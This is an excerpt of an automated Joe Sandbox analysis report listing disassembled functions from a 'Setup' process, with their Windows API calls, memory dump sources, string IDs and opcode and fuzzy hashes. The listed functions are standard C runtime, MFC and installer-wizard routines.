                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Drive1$Drive2$Drive3$Placement$Text
                                                                                                                                                                    • API String ID: 431132790-3260609399
                                                                                                                                                                    • Opcode ID: 5422fa26d39a610e905e4934e9bd49bf0dd8c2ecd2ee024dd266da83a580fa08
                                                                                                                                                                    • Instruction ID: 73bd3dd9c6951e73b93e4e056c060e06c35d26d05af2b0c46a9992f722424cec
                                                                                                                                                                    • Opcode Fuzzy Hash: 5422fa26d39a610e905e4934e9bd49bf0dd8c2ecd2ee024dd266da83a580fa08
                                                                                                                                                                    • Instruction Fuzzy Hash: 18715D7190014CDFDB00DBECC854BEEBBB8AF29318F188998E115E7291DB349A09D761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A3979 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,009A6F08,00000008,009A3A86,00000000,00000000,?,009A2FA5,00000003), ref: 009A398A
                                                                                                                                                                    • __lock.LIBCMT ref: 009A39BE
                                                                                                                                                                      • Part of subcall function 009A4331: __mtinitlocknum.LIBCMT ref: 009A4347
                                                                                                                                                                      • Part of subcall function 009A4331: __amsg_exit.LIBCMT ref: 009A4353
                                                                                                                                                                      • Part of subcall function 009A4331: EnterCriticalSection.KERNEL32(?,?,?,009A39C3,0000000D,?,009A2FA5,00000003), ref: 009A435B
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(009A8560), ref: 009A39CB
                                                                                                                                                                    • __lock.LIBCMT ref: 009A39DF
                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 009A39FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                    • String ID: KERNEL32.DLL
                                                                                                                                                                    • API String ID: 637971194-2576044830
                                                                                                                                                                    • Opcode ID: 2238df4e014e12db94b3ec9bc929f40c53386eb90dd491141d6e4eca0a274c76
                                                                                                                                                                    • Instruction ID: bb6e47d02e919033224a22e004709832e893f5080187ff941302d1d5a9532da2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2238df4e014e12db94b3ec9bc929f40c53386eb90dd491141d6e4eca0a274c76
                                                                                                                                                                    • Instruction Fuzzy Hash: F7018075804B00DFDB209F69D90674AFBE0AF82325F10894EF4D6967E1CBB0A645CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 6990288F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 699028B0
                                                                                                                                                                      • Part of subcall function 698F9BE0: __getptd_noexit.LIBCMT ref: 698F9BE3
                                                                                                                                                                      • Part of subcall function 698F9BE0: __amsg_exit.LIBCMT ref: 698F9BF0
                                                                                                                                                                    • __getptd.LIBCMT ref: 699028C1
                                                                                                                                                                    • __getptd.LIBCMT ref: 699028CF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                    • API String ID: 803148776-2671469338
                                                                                                                                                                    • Opcode ID: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                                                                                                    • Instruction ID: 5d5cd09c9c213d5d5d6ab09467cc7c9ae28702c40f9d6b4840edf010f75edab3
                                                                                                                                                                    • Opcode Fuzzy Hash: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE012381182048FD710DB68C0AA75C33D8BB44398F6568A9DC5CC7223C739E4928A52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A2930 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,009A2980), ref: 009A293F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009A2956
                                                                                                                                                                    • GetProcAddress.KERNEL32(DecodePointer), ref: 009A2968
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                                                                                                                                    • API String ID: 2238633743-1525541703
                                                                                                                                                                    • Opcode ID: 6b711eff8519cf42c8341fe5ea15f0e73498b01dc0cd2a689ae93e0ee9d8bdab
                                                                                                                                                                    • Instruction ID: 16bac240290b14f6519dd87045b8ae26aaf0866ea8a4e92c55eeebc00a8a91f9
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b711eff8519cf42c8341fe5ea15f0e73498b01dc0cd2a689ae93e0ee9d8bdab
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DE04275968224AACB14AFADBC09A863EE4FF877A5B004026B51497670D67C1480FFE0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F4100 Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F4107
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F4,0000006A), ref: 698F411B
                                                                                                                                                                      • Part of subcall function 698DFF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 698DFF21
                                                                                                                                                                    • GetParent.USER32(?), ref: 698F4157
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000485,00000000,0000006A), ref: 698F4162
                                                                                                                                                                    • GetParent.USER32(?), ref: 698F416F
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 698F4174
                                                                                                                                                                      • Part of subcall function 698F8E26: HeapFree.KERNEL32(00000000,00000000,?,698F9BCC,00000000,?,698FB575,698F9054), ref: 698F8E3C
                                                                                                                                                                      • Part of subcall function 698F8E26: GetLastError.KERNEL32(00000000,?,698F9BCC,00000000,?,698FB575,698F9054), ref: 698F8E4E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1093383602-0
                                                                                                                                                                    • Opcode ID: 1a78a3e52264da830bb46d00acbe2c77661240d0b6c68a70540341b401f11e98
                                                                                                                                                                    • Instruction ID: 09644f0cdf952bcd2ac003abf4286bb758519dd53dc9029ddeddb895d52ddef6
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a78a3e52264da830bb46d00acbe2c77661240d0b6c68a70540341b401f11e98
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C112A74A00208DBCF14DFA9C94999EFBF4FFA9744B10891EE126E72A0DB759905CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A591A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 009A5926
                                                                                                                                                                      • Part of subcall function 009A3AB0: __getptd_noexit.LIBCMT ref: 009A3AB3
                                                                                                                                                                      • Part of subcall function 009A3AB0: __amsg_exit.LIBCMT ref: 009A3AC0
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 009A5946
                                                                                                                                                                    • __lock.LIBCMT ref: 009A5956
                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 009A5973
                                                                                                                                                                    • _free.LIBCMT ref: 009A5986
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00861070), ref: 009A599E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                    • Opcode ID: 25788f84539979b82826e75fffd0b627c41b1be068bc894d365e765d9dedd368
                                                                                                                                                                    • Instruction ID: 371ee62091666daf5699be0b7883f1de5e6a8c58812f9d225b30e67554bc6913
                                                                                                                                                                    • Opcode Fuzzy Hash: 25788f84539979b82826e75fffd0b627c41b1be068bc894d365e765d9dedd368
                                                                                                                                                                    • Instruction Fuzzy Hash: A8018432A15E21DBDB11AB68980575FB7647FC3730F464105F8046F292CB345D55DBD2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E396A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E3971
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698E3654: __EH_prolog3.LIBCMT ref: 698E365B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: BackButton$CancelButton$FinishButton$NextButton
                                                                                                                                                                    • API String ID: 431132790-22014311
                                                                                                                                                                    • Opcode ID: 7830c38e35f62be0a3d0703f5eba83781cfb0a17cdb0260f3dcef5d2ae5efb23
                                                                                                                                                                    • Instruction ID: 02da9a9d87cd9949ad1e2b0975e93f35d88baafd6b20fbfc6131b0dfc6b68462
                                                                                                                                                                    • Opcode Fuzzy Hash: 7830c38e35f62be0a3d0703f5eba83781cfb0a17cdb0260f3dcef5d2ae5efb23
                                                                                                                                                                    • Instruction Fuzzy Hash: 67414A71900148EFDB00DBECC884B9EBBACAF19208F149999E014E7291D775DA09CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DD086 Relevance: 7.6, APIs: 5, Instructions: 88memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeH_prolog3Init
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1692324188-0
                                                                                                                                                                    • Opcode ID: 1062008d9d570dfef0163f6ce0037f9c09ac4e6a246c5ee68afb552f9130164c
                                                                                                                                                                    • Instruction ID: 9923385d9649b9c9b109ebf96f0e407421207a0e9f6ab6d61f4278c458736d9c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1062008d9d570dfef0163f6ce0037f9c09ac4e6a246c5ee68afb552f9130164c
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B317C75900208EBCF00DFA4C848A9DBBB8FF95314F148959E869EB250D735DA49CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EC1B2 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 698EC1C2
                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 698EC1CD
                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 698EC1F7
                                                                                                                                                                    • GetParent.USER32(?), ref: 698EC206
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,698EC10E,00000110), ref: 698EC22D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionItemMessageParentRaiseSendTextWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3396959766-0
                                                                                                                                                                    • Opcode ID: 1ad19ffb2c63e3160722d5f64ae8712f5c860288dd769f8903e72c7a31d47f61
                                                                                                                                                                    • Instruction ID: a7c06c67eb6c79c5abe6183291e05416485ead9c99d77b0651f57a3a3811e374
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad19ffb2c63e3160722d5f64ae8712f5c860288dd769f8903e72c7a31d47f61
                                                                                                                                                                    • Instruction Fuzzy Hash: DB11C431900244AFDB15DFE9DD85D67BBE9FF4A754B10882DF556C3510CB719811CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A6235 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 009A6243
                                                                                                                                                                      • Part of subcall function 009A6115: __FF_MSGBANNER.LIBCMT ref: 009A612E
                                                                                                                                                                      • Part of subcall function 009A6115: __NMSG_WRITE.LIBCMT ref: 009A6135
                                                                                                                                                                      • Part of subcall function 009A6115: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,009A4F49,?,00000001,?,?,009A42B7,00000018,009A6F78,0000000C,009A434C), ref: 009A615A
                                                                                                                                                                    • _free.LIBCMT ref: 009A6256
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                                    • Opcode ID: afbc5b2076c6dba1f3f877fe7b467d02913b8955dece88a78593cfd692fdeab8
                                                                                                                                                                    • Instruction ID: 867ee8730a02bf3c2d96f61af5e6605e09170747257c47ca5b576d0bff89fa27
                                                                                                                                                                    • Opcode Fuzzy Hash: afbc5b2076c6dba1f3f877fe7b467d02913b8955dece88a78593cfd692fdeab8
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11C636508225ABCF212F74AC05B5A3B99EFC33B0F284525FC68DB191EFB5884097E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A566A Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 009A5676
                                                                                                                                                                      • Part of subcall function 009A3AB0: __getptd_noexit.LIBCMT ref: 009A3AB3
                                                                                                                                                                      • Part of subcall function 009A3AB0: __amsg_exit.LIBCMT ref: 009A3AC0
                                                                                                                                                                    • __getptd.LIBCMT ref: 009A568D
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 009A569B
                                                                                                                                                                    • __lock.LIBCMT ref: 009A56AB
                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 009A56BF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                                    • Opcode ID: aa0135d19d26e32825474893915db441513358d86f2654390bd560fa9723144e
                                                                                                                                                                    • Instruction ID: 0152ab94e06d4afde32af17be583a99320186f1ca19de73fdb7f51b64521b735
                                                                                                                                                                    • Opcode Fuzzy Hash: aa0135d19d26e32825474893915db441513358d86f2654390bd560fa9723144e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF0B432B04B10DBDB20BB78980774E73A06F83724F668509F600AB2D2CF745A409AD6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F60A8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 233COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F60AF
                                                                                                                                                                      • Part of subcall function 698F7341: __EH_prolog3.LIBCMT ref: 698F7348
                                                                                                                                                                      • Part of subcall function 698F7341: GetLastError.KERNEL32 ref: 698F7364
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 698F62D8
                                                                                                                                                                      • Part of subcall function 698EEB56: __wcsicoll.LIBCMT ref: 698EEB74
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ErrorExceptionLastRaise__wcsicoll
                                                                                                                                                                    • String ID: Blocking Services$No Blocking Services
                                                                                                                                                                    • API String ID: 1137283054-2473106011
                                                                                                                                                                    • Opcode ID: eb4a44725c2f6ff84843c3906a01eb8e6991f46f542ccf0c0ce8710339ccc33d
                                                                                                                                                                    • Instruction ID: 7a335342222e408a9d18b4ad3b82ae5dc23ed390d06412c71ed72b7c2e3b8f24
                                                                                                                                                                    • Opcode Fuzzy Hash: eb4a44725c2f6ff84843c3906a01eb8e6991f46f542ccf0c0ce8710339ccc33d
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E915C74A0020EDFDF00CF68C985A9EB7B4FF14394F149A5CE855AB291D770EA56CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A29CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009A29D4
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 009A29E0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: KERNEL32.DLL$SetProcessDEPPolicy
                                                                                                                                                                    • API String ID: 1646373207-1809394400
                                                                                                                                                                    • Opcode ID: 50bf2df8823834ad65794e711ae4942e0bd340badffb2bfa8bdcc530672259d4
                                                                                                                                                                    • Instruction ID: 5c770149727efe0aaba820ab8e277f7f19bbb1c0e3b7fd4089a26d903dee9ad1
                                                                                                                                                                    • Opcode Fuzzy Hash: 50bf2df8823834ad65794e711ae4942e0bd340badffb2bfa8bdcc530672259d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 59C08C74398324A7CB801BF40E0AB07321A6FC3F6BF000400F241E40A0DAA0848165E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F017C Relevance: 6.1, APIs: 4, Instructions: 100windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 698F01E4
                                                                                                                                                                      • Part of subcall function 698F91B7: _malloc.LIBCMT ref: 698F91D1
                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F023D
                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698F0247
                                                                                                                                                                    • ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 698F024E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
